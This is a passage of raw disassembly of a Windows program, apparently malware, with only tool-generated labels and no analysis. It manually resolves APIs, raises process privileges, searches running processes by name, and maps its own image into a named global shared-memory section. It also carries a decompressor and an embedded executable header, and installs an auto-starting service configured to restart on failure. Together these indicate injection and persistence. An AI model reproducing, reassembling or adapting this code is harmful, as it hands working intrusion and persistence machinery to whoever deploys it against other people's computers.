mov ebx, [edi+0Ch]
add ebx, [ebp+arg_0]
push ebx
call dword_41F4F4 ; LoadLibraryA
mov [ebp+var_4], eax
mov esi, [edi+10h]
add esi, [ebp+arg_0]
jmp short loc_40233E
; ---------------------------------------------------------------------------
loc_402317: ; CODE XREF: sub_4022E0+61�j
mov eax, [esi]
test eax, 80000000h
jz short loc_402327
and eax, 80000000h
jmp short loc_40232F
; ---------------------------------------------------------------------------
loc_402327: ; CODE XREF: sub_4022E0+3E�j
mov eax, [esi]
add eax, [ebp+arg_0]
add eax, 2
loc_40232F: ; CODE XREF: sub_4022E0+45�j
push eax
push [ebp+var_4]
call dword_41F4F8 ; GetProcAddress
mov [esi], eax
add esi, 4
loc_40233E: ; CODE XREF: sub_4022E0+35�j
cmp dword ptr [esi], 0
jnz short loc_402317
add edi, 14h
loc_402346: ; CODE XREF: sub_4022E0+1D�j
cmp dword ptr [edi+0Ch], 0
jnz short loc_4022FF
pop ebx
pop esi
pop edi
leave
retn 4
sub_4022E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402360 proc near ; CODE XREF: sub_402062+7D�p
; sub_402250+36�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop ebx
pop esi
pop edi
leave
retn 0Ch
sub_402360 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402390 proc near ; CODE XREF: sub_402150+10�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push edi
push esi
push ebx
xor edi, edi
mov [ebp+var_4], edi
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call dword_41F55C ; LookupPrivilegeValueA
cmp eax, edi
jz short loc_4023F9
call dword_41F52C ; GetCurrentProcess
mov edx, eax
lea eax, [ebp+var_8]
push eax
push 28h
push edx
call dword_41F560 ; OpenProcessToken
cmp eax, edi
jz short loc_4023F9
mov esi, eax
mov [ebp+var_18], 1
mov [ebp+var_C], 2
push edi
push edi
push edi
lea eax, [ebp+var_18]
push eax
push edi
push [ebp+var_8]
call dword_41F564 ; AdjustTokenPrivileges
cmp eax, edi
jz short loc_4023F2
inc edi
loc_4023F2: ; CODE XREF: sub_402390+5F�j
push esi
call dword_41F520 ; CloseHandle
loc_4023F9: ; CODE XREF: sub_402390+21�j
; sub_402390+3A�j
; DATA XREF: ...
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 4
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402410 proc near ; CODE XREF: sub_402150+18�p
var_12C = dword ptr -12Ch
var_124 = dword ptr -124h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFED4h
push edi
push esi
push ebx
xor edi, edi
cmp eax, 1
jnz short loc_40248E
push edi
push 2
call dword_41F4FC ; CreateToolhelp32Snapshot
cmp eax, edi
jz short loc_40248E
mov [ebp+var_4], eax
mov [ebp+var_12C], 128h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_41F500 ; Process32First
cmp eax, edi
jz short loc_402485
loc_402451: ; CODE XREF: sub_402410:loc_402483�j
push [ebp+arg_0]
lea eax, [ebp+var_108]
push eax
call dword_41F538 ; lstrcmpiA
cmp eax, edi
jnz short loc_40246D
mov edi, [ebp+var_124]
jmp short loc_402485
; ---------------------------------------------------------------------------
loc_40246D: ; CODE XREF: sub_402410+53�j
lea eax, [ebp+var_12C]
push eax
push [ebp+var_4]
call dword_41F504 ; Process32Next
cmp eax, edi
jnz short loc_402483
jmp short loc_402485
; ---------------------------------------------------------------------------
loc_402483: ; CODE XREF: sub_402410+6F�j
jmp short loc_402451
; ---------------------------------------------------------------------------
loc_402485: ; CODE XREF: sub_402410+3F�j
; sub_402410+5B�j ...
push [ebp+var_4]
call dword_41F520 ; CloseHandle
loc_40248E: ; CODE XREF: sub_402410+11�j
; sub_402410+1E�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 4
sub_402410 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024A0 proc near ; CODE XREF: .text:00401F1E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push edi
push esi
push ebx
mov [ebp+var_C], 0
lea esi, off_41F2E6
lea edi, dword_41F4FC
jmp short loc_4024F9
; ---------------------------------------------------------------------------
loc_4024BE: ; CODE XREF: sub_4024A0+5D�j
mov ecx, [ebp+arg_0]
mov eax, [ebp+var_C]
lea ebx, [ecx+eax*8]
push dword ptr [ebx+4]
call dword_41F4F4 ; LoadLibraryA
mov [ebp+var_4], eax
mov eax, [ebx]
mov [ebp+var_8], eax
jmp short loc_4024F0
; ---------------------------------------------------------------------------
loc_4024DA: ; CODE XREF: sub_4024A0+54�j
push dword ptr [esi]
push [ebp+var_4]
call dword_41F4F8 ; GetProcAddress
mov [edi], eax
add edi, 4
add esi, 4
dec [ebp+var_8]
loc_4024F0: ; CODE XREF: sub_4024A0+38�j
cmp [ebp+var_8], 0
jnz short loc_4024DA
inc [ebp+var_C]
loc_4024F9: ; CODE XREF: sub_4024A0+1C�j
; DATA XREF: .data:0041BFE8�o
cmp [ebp+var_C], 2
jnz short loc_4024BE
pop ebx
pop esi
pop edi
leave
retn 8
sub_4024A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402510 proc near ; CODE XREF: .text:00401F2F�p
var_144 = byte ptr -144h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFEBCh
push edi
push esi
push ebx
push 12Ch
lea eax, [ebp+var_144]
push eax
push 0
call dword_41F548 ; GetModuleFileNameA
push 0
push 80h
push 3
push 0
push 0
push 80000000h
lea eax, [ebp+var_144]
push eax
call dword_41F54C ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_40263A
mov [ebp+var_4], eax
push 0
push [ebp+var_4]
call dword_41F550 ; GetFileSize
mov [ebp+var_C], eax
add eax, 14h
mov ecx, eax
lea eax, aGlobal2gjkgsjq ; "Global\\2gjkgsjqgq"
push eax
push ecx
push 0
push 4
push 0
push 0FFFFFFFFh
call dword_41F53C ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 6
push [ebp+var_8]
call dword_41F540 ; MapViewOfFile
mov [ebp+var_10], eax
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edi, eax
add edi, 4
mov [ebp+var_18], edi
push 0
push esp
push [ebp+var_C]
push edi
push [ebp+var_4]
call dword_41F554 ; ReadFile
push [ebp+var_4]
call dword_41F520 ; CloseHandle
mov ecx, [edi+3Ch]
add edi, ecx
movzx ebx, word ptr [edi+6]
push 0
call dword_41F558 ; GetModuleHandleA
mov [ebp+var_14], eax
mov esi, eax
mov ecx, [ebp+arg_0]
sub ecx, [ebp+var_14]
mov [edi+28h], ecx
add edi, 0F8h
mov ecx, [esi+3Ch]
add esi, ecx
add esi, 0F8h
jmp short loc_402610
; ---------------------------------------------------------------------------
loc_4025F3: ; CODE XREF: sub_402510+102�j
mov eax, [esi+0Ch]
add eax, [ebp+var_14]
mov edx, [edi+14h]
add edx, [ebp+var_18]
push dword ptr [esi+10h]
push eax
push edx
call sub_402360
add esi, 28h
add edi, 28h
dec ebx
loc_402610: ; CODE XREF: sub_402510+E1�j
or ebx, ebx
jnz short loc_4025F3
mov ecx, [ebp+arg_0]
sub ecx, [ebp+var_14]
push ecx
push [ebp+var_18]
call sub_402670
add eax, [ebp+var_18]
push [ebp+arg_4]
push 0
push eax
call sub_402650
push [ebp+var_10]
call dword_41F544 ; UnmapViewOfFile
loc_40263A: ; CODE XREF: sub_402510+42�j
pop ebx
pop esi
pop edi
leave
retn 8
sub_402510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402650 proc near ; CODE XREF: sub_402510+11C�p
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov ecx, [ebp+arg_8]
xor eax, eax
mov edi, [ebp+arg_0]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
leave
retn 0Ch
sub_402650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402670 proc near ; CODE XREF: sub_402510+10E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
pusha
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov ecx, [esi+3Ch]
add esi, ecx
movzx eax, word ptr [esi+6]
mov [ebp+var_8], eax
add esi, 0F8h
mov ebx, esi
add ebx, 28h
jmp short loc_4026C5
; ---------------------------------------------------------------------------
loc_402696: ; CODE XREF: sub_402670+59�j
mov ecx, [esi+0Ch]
mov eax, [ebx+0Ch]
cmp edi, ecx
jb short loc_4026AC
cmp edi, eax
jnb short loc_4026AC
sub edi, [esi+0Ch]
add edi, [esi+14h]
jmp short loc_4026CB
; ---------------------------------------------------------------------------
loc_4026AC: ; CODE XREF: sub_402670+2E�j
; sub_402670+32�j
cmp edi, ecx
jbe short loc_4026BC
cmp edi, eax
ja short loc_4026BC
sub edi, [ebx+0Ch]
add edi, [ebx+14h]
jmp short loc_4026CB
; ---------------------------------------------------------------------------
loc_4026BC: ; CODE XREF: sub_402670+3E�j
; sub_402670+42�j
add ebx, 28h
add esi, 28h
dec [ebp+var_8]
loc_4026C5: ; CODE XREF: sub_402670+24�j
cmp [ebp+var_8], 0
jnz short loc_402696
loc_4026CB: ; CODE XREF: sub_402670+3A�j
; sub_402670+4A�j
mov [ebp+var_4], edi
popa
mov eax, [ebp+var_4]
leave
retn 8
sub_402670 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 8Dh, 49h, 0
dd 0Ch dup(0)
dword_402710 dd 25FF0000h, 401004h, 100025FFh, 0CCCC0040h ; .data:0041F568�o
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_402062+33�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004027BF SIZE 0000000A BYTES
pusha
mov esi, [esp+20h+arg_0]
mov edi, [esp+20h+arg_4]
cld
mov dl, 80h
xor ebx, ebx
loc_40272E: ; CODE XREF: sub_402720+16�j
movsb
mov bl, 2
loc_402731: ; CODE XREF: sub_402720+3B�j
; sub_402720+81�j
call sub_4027A3
jnb short loc_40272E
xor ecx, ecx
call sub_4027A3
jnb short loc_40275D
xor eax, eax
call sub_4027A3
jnb short loc_40276D
mov bl, 2
inc ecx
mov al, 10h
loc_40274F: ; CODE XREF: sub_402720+36�j
call sub_4027A3
adc al, al
jnb short loc_40274F
jnz short loc_402799
stosb
jmp short loc_402731
; ---------------------------------------------------------------------------
loc_40275D: ; CODE XREF: sub_402720+1F�j
call sub_4027AF
sub ecx, ebx
jnz short loc_402776
call sub_4027AD
jmp short loc_402795
; ---------------------------------------------------------------------------
loc_40276D: ; CODE XREF: sub_402720+28�j
lodsb
shr eax, 1
jz short loc_4027BF
adc ecx, ecx
jmp short loc_402792
; ---------------------------------------------------------------------------
loc_402776: ; CODE XREF: sub_402720+44�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_4027AD
cmp eax, 7D00h
jnb short loc_402792
cmp ah, 5
jnb short loc_402793
cmp eax, 7Fh
ja short loc_402794
loc_402792: ; CODE XREF: sub_402720+54�j
; sub_402720+66�j
inc ecx
loc_402793: ; CODE XREF: sub_402720+6B�j
inc ecx
loc_402794: ; CODE XREF: sub_402720+70�j
xchg eax, ebp
loc_402795: ; CODE XREF: sub_402720+4B�j
mov eax, ebp
mov bl, 1
loc_402799: ; CODE XREF: sub_402720+38�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_402731
sub_402720 endp
; =============== S U B R O U T I N E =======================================
sub_4027A3 proc near ; CODE XREF: sub_402720:loc_402731�p
; sub_402720+1A�p ...
add dl, dl
jnz short locret_4027AC
mov dl, [esi]
inc esi
adc dl, dl
locret_4027AC: ; CODE XREF: sub_4027A3+2�j
retn
sub_4027A3 endp
; =============== S U B R O U T I N E =======================================
sub_4027AD proc near ; CODE XREF: sub_402720+46�p
; sub_402720+5C�p
xor ecx, ecx
sub_4027AD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4027AF proc near ; CODE XREF: sub_402720:loc_40275D�p
inc ecx
loc_4027B0: ; CODE XREF: sub_4027AF+D�j
call sub_4027A3
adc ecx, ecx
call sub_4027A3
jb short loc_4027B0
retn
sub_4027AF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_402720
loc_4027BF: ; CODE XREF: sub_402720+50�j
sub edi, [esp+20h+arg_4]
mov [esp+20h+var_4], edi
popa
retn
; END OF FUNCTION CHUNK FOR sub_402720
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 19h dup(0)
dd 18h dup(?)
dword_402890 dd 0Dh dup(?) ; sub_404CC5+85�o
db ?
byte_4028C5 db 3 dup(?) ; DATA XREF: sub_404CC5+80�o
dd 4Eh dup(?)
_text ends
; Section 2. (virtual address 00003000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00003000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
rdata segment para public 'BSS' use32
assume cs:rdata
;org 403000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_403000 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; .data:off_41F1DE�o
dd 40h, 8 dup(0)
dd 0D0h, 0EBA1F0Eh, 0CD09B400h
dword_403048 dd 4C01B821h, 685421CDhaIsProgramCanno db 'is program cannot be run in DOS mode.',0Dh,0Dh,0Ah
; DATA XREF: rdata:0040538E�o
db '$',0
align 10h
dd 5B01EB7Ah, 3 dup(86F8A3Eh), 86E8A3Eh, 86F8A3Fh, 86B9551h
dd 86F8A3Ch, 87DAAC2h, 86F8A01h, 87C95B0h, 86F8A40h, 68636952h
dd 86F8A3Eh, 6 dup(0)
dd 4550h, 4014Ch, 454B9FFDh, 2 dup(0)
dd 10E00E0h, 0C05010Bh, 11800h, 9C00h, 0
dd 7490h, 1000h, 13000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 1E000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 13BE0h, 0A9h, 131D8h, 0C8h, 6 dup(0)
dd 1D000h, 0B68h, 0Ch dup(0)
dd 13000h, 1D8h, 6 dup(0)
dd 7865742Eh, 74h, 116F0h, 1000h, 11800h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 0C89h, 13000h, 0E00h, 11C00h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 807Ch, 14000h, 6E00h, 12A00h
dd 3 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 0BCCh, 1D000h, 0C00h
dd 19800h, 3 dup(0)
dd 42000040h, 12h dup(0)
db 2 dup(0)
word_4032B2 dw 0 ; DATA XREF: rdata:0040545B�o
dd 3Fh dup(0)
dword_4033B0 dd 14h dup(0) ; sub_408DC0+1E7�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403400 proc near ; CODE XREF: sub_4099E5+18�p
; rdata:00409D84�p
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFED0h
push edi
push esi
push ebx
xor edi, edi
push [ebp+arg_0]
call sub_40A266
inc eax
mov [ebp+var_130], eax
mov esi, dword_41BC34
mov ebx, off_41BC38
loc_403429: ; DATA XREF: .data:00420D4A�r
; .data:loc_420D64�r ...
jmp short loc_403469
; ---------------------------------------------------------------------------
loc_40342B: ; CODE XREF: sub_403400+6B�j
; DATA XREF: .data:00420CF4�r ...
push [ebp+var_130]
loc_403431: ; DATA XREF: sub_41F78E:loc_41F7C1�r
; sub_41F78E+BE�r ...
push dword ptr [esi]
lea eax, [ebp+var_12C]
push eax
call sub_40A260
push [ebp+arg_0]
lea eax, [ebp+var_12C]
push eax
call sub_40A254
or eax, eax
jnz short loc_403465
mov edx, [esi]
add edx, [ebp+var_130]
dec edx
push edx
push [ebp+arg_4]
call sub_40A25A
inc edi
loc_403465: ; CODE XREF: sub_403400+50�j
dec ebx
add esi, 4
loc_403469: ; CODE XREF: sub_403400:loc_403429�j
or ebx, ebx
jnz short loc_40342B
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 8
sub_403400 endp
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h, 8D535657h, 41474435h, 583D8D00h, 8B004147h
dd 4147401Dh, 0FF1BEB00h, 92E836h, 0F8830000h, 8B087501h
dd 3C050907h, 83004147h, 0C68304C7h, 0DB0B4B04h, 5E5BE175h
dd 9B8DC35Fh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFDA8h
push edi
push esi
push ebx
call sub_40A15E
mov edx, eax
push offset off_41BC38
push edx
call sub_40A29C
mov esi, eax
mov dword_41BC34, esi
mov ebx, off_41BC38
jmp short loc_40351D
; ---------------------------------------------------------------------------
loc_4034EE: ; CODE XREF: rdata:0040351F�j
push 0
push 0
push 258h
lea eax, [ebp-258h]
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push 0
push 0
call sub_40A23C
lea eax, [ebp-258h]
push eax
push dword ptr [esi]
call sub_40A25A
add esi, 4
dec ebx
loc_40351D: ; CODE XREF: rdata:004034EC�j
or ebx, ebx
jnz short loc_4034EE
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
xor edi, edi
mov esi, dword_41BC34
mov ebx, off_41BC38
loc_403544: ; DATA XREF: sub_41F78E+3�w
; sub_41F78E+13�r
jmp short loc_403559
; ---------------------------------------------------------------------------
loc_403546: ; CODE XREF: rdata:0040355B�j
; DATA XREF: .data:0041FADC�o
push dword ptr [ebp+8]
push dword ptr [esi]
call sub_40A254
loc_403550: ; DATA XREF: sub_41F78E+121�w
; .data:0041F908�r ...
or eax, eax
jnz short loc_403555
inc edi
loc_403555: ; CODE XREF: rdata:00403552�j
dec ebx
add esi, 4
loc_403559: ; CODE XREF: rdata:loc_403544�j
or ebx, ebx
jnz short loc_403546
mov eax, edi
pop ebx
loc_403560: ; DATA XREF: sub_421405+9E�r
pop esi
pop edi
leave
retn 4
; ---------------------------------------------------------------------------
dw 0A48Dh
dd 24h, 498D00h
; ---------------------------------------------------------------------------
loc_403570: ; DATA XREF: sub_41F78E:loc_41F977�r
push ebp
mov ebp, esp
add esp, 0FFFFFBCCh
push edi
push esi
push ebx
loc_40357C: ; DATA XREF: sub_421405+7�r
call sub_403B20
xor edi, edi
mov [ebp-404h], edi
push 200h
lea eax, [ebp-200h]
loc_403594: ; DATA XREF: sub_41F78E+106�r
push eax
push edi
call sub_40A188
cmp eax, edi
jz short loc_403614
lea eax, [ebp-200h]
push eax
push (offset loc_414686+1)
lea eax, [ebp-400h]
push eax
call sub_40A0F2
add esp, 0Ch
push 0F003Fh
push edi
push edi
call ds:dword_41499B
mov esi, eax
cmp eax, edi
jz short loc_403614
mov edx, 1A7h
push edi
push edi
loc_4035D4: ; DATA XREF: sub_41F78E+22A�r
; sub_41FFC3:loc_420027�r
lea eax, [ebp-404h]
push eax
push edi
loc_4035DC: ; DATA XREF: sub_41F78E+257�r
; sub_41FFC3:loc_42005A�r
push edi
lea eax, [ebp-400h]
push eax
loc_4035E4: ; DATA XREF: sub_41F78E+2F6�r
; sub_41FFC3+3E�r
push 0
push 2
loc_4035E8: ; DATA XREF: sub_41F78E+239�r
; sub_41FFC3+75�r
push 110h
push edx
push (offset loc_4146EA+3)
push (offset loc_4146B8+1)
loc_4035F8: ; DATA XREF: sub_41F78E+21D�r
push esi
call ds:dword_414997
mov ebx, eax
cmp eax, edi
jz short loc_40360D
inc edi
push ebx
call ds:dword_4149AB
loc_40360D: ; CODE XREF: rdata:00403603�j
push esi
call ds:dword_4149AB
loc_403614: ; CODE XREF: rdata:0040359D�j
; rdata:004035CB�j
cmp edi, 1
jnz loc_403717
xor edi, edi
push 0F003Fh
push edi
push edi
call ds:dword_41499B
mov ebx, eax
cmp eax, edi
jz loc_403717
push 0F01FFh
push (offset loc_4146B8+1)
push ebx
call ds:dword_41499F
mov esi, eax
cmp eax, edi
jz loc_403710
mov dword ptr [ebp-408h], (offset loc_4146BF+1)
lea eax, [ebp-408h]
push eax
push 1
push esi
call ds:dword_4149A3
or eax, eax
jnz short loc_403674
call sub_40A17C
loc_403674: ; CODE XREF: rdata:0040366D�j
push offset byte_4147AB
call sub_403B90
mov dword ptr [ebp-434h], 1
mov dword ptr [ebp-430h], 600h
mov dword ptr [ebp-42Ch], 3
mov dword ptr [ebp-428h], 120h
mov dword ptr [ebp-424h], 0
mov dword ptr [ebp-420h], 120h
mov dword ptr [ebp-41Ch], 1000h
mov dword ptr [ebp-418h], 0
lea eax, [ebp-200h]
mov [ebp-414h], eax
mov dword ptr [ebp-410h], 3
lea eax, [ebp-434h]
mov [ebp-40Ch], eax
lea eax, [ebp-41Ch]
push eax
push 2
push esi
call ds:dword_4149A3
or eax, eax
jnz short loc_403709
call sub_40A17C
loc_403709: ; CODE XREF: rdata:00403702�j
push esi
call ds:dword_4149AB
loc_403710: ; CODE XREF: rdata:0040364B�j
push ebx
call ds:dword_4149AB
loc_403717: ; CODE XREF: rdata:00403617�j
; rdata:00403630�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
dw 0FF8Bh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
call sub_403B20
xor edi, edi
mov [ebp-4], edi
push 0F003Fh
push edi
push edi
call ds:dword_41499B
mov ebx, eax
cmp eax, edi
jz short loc_4037C2
push 0F01FFh
push (offset loc_4146B8+1)
push ebx
call ds:dword_41499F
mov esi, eax
cmp eax, edi
jz short loc_4037BB
push offset dword_41BC04
push 1
push esi
call ds:dword_4149A7
jmp short loc_40379A
; ---------------------------------------------------------------------------
loc_40376D: ; CODE XREF: rdata:0040379C�j
push 3E8h
call sub_40A212
push offset dword_41BC04
push esi
call ds:dword_4149B7
lea ecx, dword_41BC04
cmp dword ptr [ecx+4], 1
jz short loc_403795
cmp dword ptr [ebp-4], 4
jbe short loc_403797
loc_403795: ; CODE XREF: rdata:0040378D�j
jmp short loc_40379E
; ---------------------------------------------------------------------------
loc_403797: ; CODE XREF: rdata:00403793�j
inc dword ptr [ebp-4]
loc_40379A: ; CODE XREF: rdata:0040376B�j
cmp eax, edi
jnz short loc_40376D
loc_40379E: ; CODE XREF: rdata:loc_403795�j
push 3E8h
call sub_40A212
push esi
call ds:dword_4149AF
cmp eax, edi
jz short loc_4037B4
inc edi
loc_4037B4: ; CODE XREF: rdata:004037B1�j
push esi
call ds:dword_4149AB
loc_4037BB: ; CODE XREF: rdata:0040375B�j
push ebx
call ds:dword_4149AB
loc_4037C2: ; CODE XREF: rdata:00403744�j
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push edi
push esi
push ebx
call sub_403B20
xor edi, edi
mov dword ptr [ebp-10h], (offset loc_4146B8+1)
mov dword ptr [ebp-0Ch], offset dword_4014E0
mov [ebp-8], edi
mov [ebp-4], edi
mov off_41BC2C, 1
lea eax, [ebp-10h]
push eax
call ds:dword_4149BB
cmp eax, edi
jnz short loc_403816
call sub_40A17C
call sub_4099E5
; ---------------------------------------------------------------------------
loc_403816: ; CODE XREF: rdata:0040380A�j
pop ebx
pop esi
loc_403818: ; DATA XREF: sub_408DC0+1A3�o
; sub_408DC0+1BE�o
pop edi
leave
retn
; ---------------------------------------------------------------------------
db 5
align 10h
dd 0E8535657h, 2F8h, 3F68FF33h, 57000F00h, 9B15FF57h, 8B004149h
dd 74C73BD8h, 68106A3Ch, 4146B9h, 9F15FF53h, 8B004149h
dd 74C73BF0h, 56575721h, 49B315FFh, 0C73B0041h, 0EB470374h
dd 6916E80Ah, 7AE80000h, 56000061h, 49AB15FFh, 0FF530041h
dd 4149AB15h, 5BC78B00h, 90C35F5Eh, 0E8535657h, 298h, 3F68FF33h
dd 57000F00h, 9B15FF57h, 8B004149h, 74C73BD8h, 68206A35h
dd 4146B9h, 9F15FF53h, 8B004149h, 74C73BF0h, 0BC04681Ah
dd 16A0041h, 0A715FF56h, 3B004149h, 470174C7h, 0AB15FF56h
dd 53004149h, 49AB15FFh, 0C78B0041h, 0C35F5E5Bh, 24A48Dh
dd 90000000h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
call sub_403B20
xor edi, edi
push offset loc_401540
push (offset loc_4146B8+1)
call ds:dword_4149BF
mov off_41BC20, eax
cmp eax, edi
jz short loc_403933
mov dword_41BC04, 110h
mov off_41BC14, edi
push 2
push 3E8h
call sub_403970
cmp eax, edi
jz short loc_403933
push 4
push edi
call sub_403970
call sub_4099E5
; ---------------------------------------------------------------------------
loc_403933: ; CODE XREF: rdata:00403904�j
; rdata:00403924�j
pop ebx
pop esi
pop edi
leave
retn 8
; ---------------------------------------------------------------------------
dw 9B8Dh
align 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
cmp dword ptr [ebp+8], 1
jnz short loc_403959
push off_41BC3C
loc_403952: ; DATA XREF: sub_421405+16�w
; sub_421941+53�r
call sub_40A1FA
jmp short loc_403966
; ---------------------------------------------------------------------------
loc_403959: ; CODE XREF: rdata:0040394A�j
push off_41BC08
push 0
call sub_403970
loc_403966: ; CODE XREF: rdata:00403957�j
pop ebx
pop esi
pop edi
leave
locret_40396A: ; DATA XREF: sub_421405+88�w
; sub_42151C+36�r
retn 4
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403970 proc near ; CODE XREF: rdata:0040391D�p
; rdata:00403929�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
loc_403976: ; DATA XREF: sub_4214D7+3E�w
; sub_4215FB+121�r ...
call sub_403B20
xor edi, edi
mov eax, 1
loc_403982: ; DATA XREF: .data:00420D36�w
; .data:004210C3�r ...
cmp off_41BC2C, edi
jz short loc_4039D4
loc_40398A: ; DATA XREF: .data:00420E8E�w
; .data:00420F89�w ...
xor eax, eax
cmp [ebp+arg_4], 2
jz short loc_403993
loc_403992: ; DATA XREF: sub_4209BF�w sub_4209FC�w ...
inc eax
loc_403993: ; CODE XREF: sub_403970+20�j
mov off_41BC0C, eax
push [ebp+arg_4]
pop off_41BC08
push [ebp+arg_0]
pop dword_41BC1C
loc_4039AA: ; DATA XREF: sub_420909+8�w
; sub_420909+36�w ...
cmp [ebp+arg_4], 4
loc_4039AE: ; DATA XREF: sub_4211CF+2�r
; sub_421388+4B�w ...
jnz short loc_4039BE
cmp [ebp+arg_4], 1
jnz short loc_4039BE
loc_4039B6: ; DATA XREF: sub_41F78E+51�r
inc off_41BC18
jmp short loc_4039C4
; ---------------------------------------------------------------------------
loc_4039BE: ; CODE XREF: sub_403970:loc_4039AE�j
; sub_403970+44�j
; DATA XREF: ...
mov off_41BC18, edi
loc_4039C4: ; CODE XREF: sub_403970+4C�j
push offset dword_41BC04
push off_41BC20
call sub_40A2EA
loc_4039D4: ; CODE XREF: sub_403970+18�j
pop ebx
pop esi
pop edi
leave
retn 8
sub_403970 endp
; ---------------------------------------------------------------------------
db 5
align 10h
dd 33535657h, 46AC68FFh, 9FE80041h, 3B000067h, 8B1D74C7h
dd 469568D0h, 0E8520041h, 6794h, 0F73BF08Bh, 5FE80A74h
dd 6A000067h, 0D6FF5001h, 5FD0E8h, 74F73B00h, 674CE809h
dd 50570000h, 3DE8D6FFh, 57000067h, 67F0E850h, 5E5B0000h
dd 0A48DC35Fh, 24h, 24A48D00h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFDFCh
push edi
push esi
push ebx
xor edi, edi
push 200h
lea eax, [ebp-200h]
